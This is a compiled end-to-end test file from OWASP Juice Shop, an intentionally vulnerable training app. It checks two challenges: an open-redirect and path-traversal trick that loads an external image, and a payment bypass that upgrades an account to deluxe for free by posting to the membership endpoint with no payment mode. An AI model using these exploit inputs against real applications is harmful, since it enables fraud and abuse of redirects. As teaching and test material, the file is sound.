"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const request = require("request");
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
const config = require('config');
describe('/#/deluxe-membership', () => {
    describe('challenge "svgInjection"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `jim@${config.get('application.domain')}`, password: 'ncc-1701' });
        it('should be possible to pass in a forgotten test parameter abusing the redirect-endpoint to load an external image', () => {
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/deluxe-membership?testDecal=${encodeURIComponent(`../../..${e2eHelpers_1.basePath}/redirect?to=https://placekitten.com/g/200/100?x=https://github.com/bkimminich/juice-shop`)}`);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Cross-Site Imaging' });
    });
    describe('challenge "freeDeluxe"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `jim@${config.get('application.domain')}`, password: 'ncc-1701' });
        it('should upgrade to deluxe for free by making a post request to /rest/deluxe-membership by setting the paymentMode parameter to null', () => {
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/`);
            void protractor_1.browser.manage().getCookie('token').then((token) => {
                request.post(`${protractor_1.browser.baseUrl}/rest/deluxe-membership`, {
                    headers: { Authorization: `Bearer ${token.value}` }
                }, (err, response, body) => {
                    expect(err).not.toBeTruthy();
                    expect(JSON.parse(body).status).toEqual('success');
                    (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Deluxe Fraud' });
                });
            });
        });
    });
});
//# sourceMappingURL=deluxeSpec.js.map